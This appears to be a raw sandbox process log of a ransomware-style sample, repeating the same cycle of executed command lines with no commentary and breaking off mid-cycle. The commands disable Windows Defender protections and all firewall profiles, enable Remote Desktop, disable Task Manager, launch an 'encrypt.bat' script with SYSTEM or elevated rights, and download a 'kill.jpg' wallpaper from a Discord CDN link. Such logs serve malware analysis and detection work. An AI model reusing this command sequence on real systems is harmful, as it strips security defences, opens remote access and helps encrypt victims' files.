C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

